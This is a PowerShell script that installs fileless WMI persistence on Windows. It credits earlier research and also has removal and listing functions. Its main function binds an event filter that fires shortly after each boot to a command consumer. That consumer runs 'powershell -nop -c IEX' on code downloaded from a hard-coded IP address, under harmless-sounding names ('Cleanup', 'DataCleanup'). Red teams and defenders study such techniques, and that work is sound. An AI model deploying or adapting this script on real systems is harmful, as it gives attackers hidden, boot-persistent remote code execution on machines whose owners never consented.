└── WMI-Persistence.ps1 /WMI-Persistence.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence. This script is an adaptation of his work. 3 | #> 4 | 5 | function Install-Persistence{ 6 | 7 | $Payload = "((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))" 8 | $EventFilterName = 'Cleanup' 9 | $EventConsumerName = 'DataCleanup' 10 | $finalPayload = "powershell.exe -nop -c `"IEX $Payload`"" 11 | 12 | # Create event filter 13 | $EventFilterArgs = @{ 14 | EventNamespace = 'root/cimv2' 15 | Name = $EventFilterName 16 | Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" 17 | QueryLanguage = 'WQL' 18 | } 19 | 20 | $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs 21 | 22 | # Create CommandLineEventConsumer 23 | $CommandLineConsumerArgs = @{ 24 | Name = $EventConsumerName 25 | CommandLineTemplate = $finalPayload 26 | } 27 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs 28 | 29 | # Create FilterToConsumerBinding 30 | $FilterToConsumerArgs = @{ 31 | Filter = $Filter 32 | Consumer = $Consumer 33 | } 34 | $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs 35 | 36 | #Confirm the Event Filter was created 37 | $EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'" 38 | if ($EventCheck -ne $null) { 39 | Write-Host "Event Filter $EventFilterName successfully written to host" 40 | } 41 | 42 | #Confirm the Event Consumer was created 43 | $ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'" 44 | if ($ConsumerCheck -ne $null) { 45 | Write-Host "Event Consumer $EventConsumerName successfully written to host" 46 | } 47 | 48 | #Confirm the FiltertoConsumer was created 49 | $BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='$EventFilterName'""" 50 | if ($BindingCheck -ne $null){ 51 | Write-Host "Filter To Consumer Binding successfully written to host" 52 | } 53 | 54 | } 55 | 56 | function Remove-Persistence{ 57 | $EventFilterName = 'Cleanup' 58 | $EventConsumerName = 'DataCleanup' 59 | 60 | # Clean up Code - Comment this code out when you are installing persistence otherwise it will 61 | 62 | $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = '$EventConsumerName'" 63 | $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = '$EventFilterName'" 64 | $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" 65 | 66 | $FilterConsumerBindingToCleanup | Remove-WmiObject 67 | $EventConsumerToCleanup | Remove-WmiObject 68 | $EventFilterToCleanup | Remove-WmiObject 69 | 70 | } 71 | 72 | function Check-WMI{ 73 | Write-Host "Showing All Root Event Filters" 74 | Get-WmiObject -Namespace root/subscription -Class __EventFilter 75 | 76 | Write-Host "Showing All CommandLine Event Consumers" 77 | Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer 78 | 79 | Write-Host "Showing All Filter to Consumer Bindings" 80 | Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding 81 | } 82 | --------------------------------------------------------------------------------